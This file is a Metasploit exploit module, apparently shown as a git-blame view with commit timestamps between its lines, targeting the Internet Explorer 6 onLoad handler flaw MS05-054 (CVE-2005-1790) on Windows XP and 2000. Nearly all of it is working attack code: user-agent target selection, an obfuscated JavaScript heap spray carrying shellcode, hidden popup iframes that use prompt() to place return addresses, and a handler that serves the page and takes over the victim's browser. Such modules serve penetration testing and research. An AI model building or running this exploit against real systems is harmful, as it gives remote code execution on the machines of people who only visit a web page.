2012-01-06 06:12:28 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
Rank = NormalRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
2012-01-17 09:00:07 +00:00
|
|
|
'Name' => 'MS05-054: Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution',
|
2012-01-06 06:12:28 +00:00
|
|
|
'Description' => %q{
|
2012-01-13 00:01:22 +00:00
|
|
|
This bug is triggered when the browser handles a JavaScript 'onLoad' handler in
|
2012-01-06 06:47:01 +00:00
|
|
|
conjunction with an improperly initialized 'window()' JavaScript function.
|
2012-01-13 00:37:25 +00:00
|
|
|
This exploit results in a call to an address lower than the heap. The javascript
|
|
|
|
prompt() places our shellcode near where the call operand points to. We call
|
|
|
|
prompt() multiple times in separate iframes to place our return address.
|
|
|
|
We hide the prompts in a popup window behind the main window. We spray the heap
|
|
|
|
a second time with our shellcode and point the return address to the heap. I use
|
|
|
|
a fairly high address to make this exploit more reliable. IE will crash when the
|
|
|
|
exploit completes. Also, please note that Internet Explorer must allow popups
|
|
|
|
in order to continue exploitation.
|
2012-01-06 06:12:28 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
2012-01-13 00:37:25 +00:00
|
|
|
'Benjamin Tobias Franz', # Discovery
|
|
|
|
'Stuart Pearson', # Proof of Concept
|
|
|
|
'Sam Sharps' # Metasploit port
|
2012-01-06 06:12:28 +00:00
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['MSB', 'MS05-054'],
|
|
|
|
['CVE', '2005-1790'],
|
2012-01-13 19:21:33 +00:00
|
|
|
['OSVDB', '17094'],
|
2012-01-13 00:01:22 +00:00
|
|
|
['URL', 'http://www.securityfocus.com/bid/13799/info'],
|
2012-01-06 06:47:01 +00:00
|
|
|
['URL', 'http://www.cvedetails.com/cve/CVE-2005-1790'],
|
2012-01-06 06:12:28 +00:00
|
|
|
],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'process',
|
|
|
|
'InitialAutoRunScript' => 'migrate -f',
|
|
|
|
},
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 1000,
|
|
|
|
'BadChars' => "\x00",
|
|
|
|
'Compat' =>
|
|
|
|
{
|
|
|
|
'ConnectionType' => '-find',
|
|
|
|
},
|
|
|
|
'StackAdjustment' => -3500,
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
2012-01-13 00:37:25 +00:00
|
|
|
[ 'Internet Explorer 6 on Windows XP', { 'iframes' => 4 } ],
|
|
|
|
[ 'Internet Explorer 6 Windows 2000', { 'iframes' => 8 } ],
|
2012-01-06 06:12:28 +00:00
|
|
|
],
|
2012-01-13 02:54:55 +00:00
|
|
|
'DisclosureDate' => 'Nov 21 2005',
|
2012-01-06 06:12:28 +00:00
|
|
|
'DefaultTarget' => 0))
|
2012-01-13 00:37:25 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
2012-01-06 06:12:28 +00:00
|
|
|
@var_redir = rand_text_alpha(rand(100)+1)
|
2012-01-13 00:37:25 +00:00
|
|
|
super
|
2012-01-06 06:12:28 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def auto_target(cli, request)
|
|
|
|
mytarget = nil
|
|
|
|
|
|
|
|
agent = request.headers['User-Agent']
|
|
|
|
print_status("Checking user agent: #{agent}")
|
|
|
|
|
|
|
|
if (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.1/)
|
|
|
|
mytarget = targets[0] # IE6 on XP
|
|
|
|
elsif (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.0/)
|
|
|
|
mytarget = targets[1] # IE6 on 2000
|
|
|
|
else
|
|
|
|
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
|
|
|
|
end
|
|
|
|
|
|
|
|
mytarget
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def on_request_uri(cli, request)
|
2012-01-13 00:37:25 +00:00
|
|
|
mytarget = auto_target(cli, request)
|
|
|
|
var_title = rand_text_alpha(rand(100) + 1)
|
|
|
|
func_main = rand_text_alpha(rand(100) + 1)
|
2012-01-06 06:12:28 +00:00
|
|
|
|
|
|
|
heapspray = ::Rex::Exploitation::JSObfu.new %Q|
|
|
|
|
function heapspray()
|
|
|
|
{
|
2012-01-13 00:01:22 +00:00
|
|
|
shellcode = unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
|
2012-01-13 00:37:25 +00:00
|
|
|
var bigblock = unescape("#{Rex::Text.to_unescape(make_nops(4))}");
|
2012-01-13 00:01:22 +00:00
|
|
|
var headersize = 20;
|
|
|
|
var slackspace = headersize + shellcode.length;
|
|
|
|
while (bigblock.length < slackspace) bigblock += bigblock;
|
|
|
|
var fillblock = bigblock.substring(0,slackspace);
|
|
|
|
var block = bigblock.substring(0,bigblock.length - slackspace);
|
|
|
|
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
|
|
|
|
var memory = new Array();
|
|
|
|
for (i = 0; i < 250; i++){ memory[i] = block + shellcode }
|
|
|
|
|
2012-01-13 00:13:28 +00:00
|
|
|
var ret = "";
|
2012-01-06 06:12:28 +00:00
|
|
|
var fillmem = "";
|
|
|
|
|
2012-01-13 00:13:28 +00:00
|
|
|
for (i = 0; i < 500; i++)
|
|
|
|
ret += unescape("%u0F0F%u0F0F");
|
|
|
|
for (i = 0; i < 200; i++)
|
|
|
|
fillmem += ret;
|
2012-01-06 06:12:28 +00:00
|
|
|
|
|
|
|
prompt(fillmem, "");
|
|
|
|
}
|
|
|
|
|
|
|
|
|
heapspray.obfuscate
|
|
|
|
|
|
|
|
nofunc = ::Rex::Exploitation::JSObfu.new %Q|
|
2012-01-13 00:01:22 +00:00
|
|
|
|
2012-01-06 06:12:28 +00:00
|
|
|
if (document.location.href.indexOf("#{@var_redir}") == -1)
|
|
|
|
{
|
|
|
|
var counter = 0;
|
|
|
|
|
2012-01-13 00:01:22 +00:00
|
|
|
|
2012-01-06 06:12:28 +00:00
|
|
|
top.consoleRef = open('','BlankWindow',
|
|
|
|
'width=100,height=100'
|
|
|
|
+',menubar=0'
|
|
|
|
+',toolbar=1'
|
|
|
|
+',status=0'
|
|
|
|
+',scrollbars=0'
|
|
|
|
+',left=1'
|
|
|
|
+',top=1'
|
|
|
|
+',resizable=1')
|
|
|
|
self.focus()
|
|
|
|
|
2012-01-13 00:01:22 +00:00
|
|
|
|
2012-01-06 06:12:28 +00:00
|
|
|
for (counter = 0; counter < #{mytarget['iframes']}; counter++)
|
|
|
|
{
|
|
|
|
top.consoleRef.document.writeln('<iframe width=1 height=1 src='+document.location.href+'?p=#{@var_redir}</iframe>');
|
|
|
|
}
|
|
|
|
document.writeln("<body onload=\\"setTimeout('#{func_main}()',6000)\\">");
|
2012-01-13 00:01:22 +00:00
|
|
|
|
2012-01-06 06:12:28 +00:00
|
|
|
}
|
|
|
|
else
|
|
|
|
{
|
|
|
|
#{heapspray.sym('heapspray')}();
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
nofunc.obfuscate
|
|
|
|
|
|
|
|
main = %Q|
|
|
|
|
function #{func_main}()
|
|
|
|
{
|
|
|
|
document.write("<TITLE>#{var_title}</TITLE>");
|
|
|
|
document.write("<body onload=window();>");
|
|
|
|
|
|
|
|
window.location.reload();
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
html = %Q|
|
|
|
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
|
|
|
|
<html>
|
|
|
|
<head>
|
|
|
|
<meta http-equiv="Content-Language" content="en-gb">
|
|
|
|
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
|
|
|
|
<script>
|
|
|
|
#{nofunc}
|
|
|
|
#{heapspray}
|
|
|
|
#{main}
|
|
|
|
</script>
|
|
|
|
</head>
|
|
|
|
<body>
|
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
|
|
|
|
|
|
|
|
|
print_status("Sending #{self.name} to client #{cli.peerhost}")
|
|
|
|
# Transmit the compressed response to the client
|
|
|
|
send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
|
|
|
|
|
|
|
|
# Handle the payload
|
|
|
|
handler(cli)
|
|
|
|
end
|
|
|
|
end
|